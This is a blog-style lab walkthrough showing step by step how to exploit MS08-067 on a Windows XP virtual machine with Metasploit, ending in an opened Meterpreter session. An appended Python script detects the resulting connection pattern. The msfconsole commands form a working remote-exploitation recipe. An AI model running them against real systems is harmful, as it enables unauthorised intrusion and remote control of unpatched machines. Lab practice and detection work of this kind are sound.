Exploit ms08-067 in Windows XP

Hi folks,
This is the last post today, and the climax. LOL
After discovering the vulnerability using Nessus, I will try to exploit the Windows target using Metasploit Framework.
The vulnerability that I will try to exploit is MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check)
First, I start msfconsole.


Then I will use exploit/windows/smb/ms08_067_netapi:
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > 

After that, I set the payload to windows/meterpreter/bind_tcp:
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > 

Then I will check which options I need to set:
msf  exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) > 

As you can see, the target address is currently empty, so I will set the target address:
msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.2
RHOST => 192.168.56.2
msf  exploit(ms08_067_netapi) > 

After checking that the options are OK, I run the exploit:
msf  exploit(ms08_067_netapi) > exploit 

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:60822 -> 192.168.56.2:4444) at 2012-12-22 01:53:58 +0700

meterpreter >

Tadaa....!! Meterpreter session opened.
Now you have access to the target system.

Note:
The target firewall is currently off.
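
From the defender's side, the session above leaves a recognizable trace: one source connects to SMB on port 445 and seconds later to port 4444, a port the host does not normally serve. The following is an added example, not part of the original post, that flags this pattern in connection records; the log format, sample lines, expected-port list and 60-second window are all assumptions made for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample of inbound TCP connection records (not from the original post):
# date, time, source IP, destination IP, destination port
SAMPLE_LOG = """\
2012-12-22 01:40:10 192.168.56.7 192.168.56.2 445
2012-12-22 01:53:55 192.168.56.1 192.168.56.2 445
2012-12-22 01:53:58 192.168.56.1 192.168.56.2 4444
2012-12-22 02:10:00 192.168.56.9 192.168.56.2 3389
2012-12-22 02:30:00 192.168.56.7 192.168.56.2 4444
"""

SMB_PORT = 445
EXPECTED_PORTS = {135, 139, 445, 3389}  # assumption: services this host is meant to expose
WINDOW = timedelta(seconds=60)          # assumption: correlation window


def parse(log_text):
    """Yield (time, src, dst, dport) tuples, skipping blank or malformed lines."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        try:
            ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S")
            yield ts, parts[2], parts[3], int(parts[4])
        except ValueError:
            continue


def find_smb_then_unexpected_port(log_text, window=WINDOW):
    """Flag a source that connects to SMB and then, within `window`, to a port
    the host is not expected to serve (the shape a bind payload produces)."""
    last_smb = {}  # (src, dst) -> time of the most recent SMB connection
    alerts = []
    for ts, src, dst, dport in sorted(parse(log_text)):
        key = (src, dst)
        if dport == SMB_PORT:
            last_smb[key] = ts
        elif dport not in EXPECTED_PORTS and key in last_smb:
            delay = ts - last_smb[key]
            if delay <= window:
                alerts.append({"src": src, "dst": dst, "port": dport,
                               "delay_s": int(delay.total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in find_smb_then_unexpected_port(SAMPLE_LOG):
        print(alert)
```

With the host firewall enabled and inbound 445 and 4444 blocked, neither connection would succeed, which is why the note above matters.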
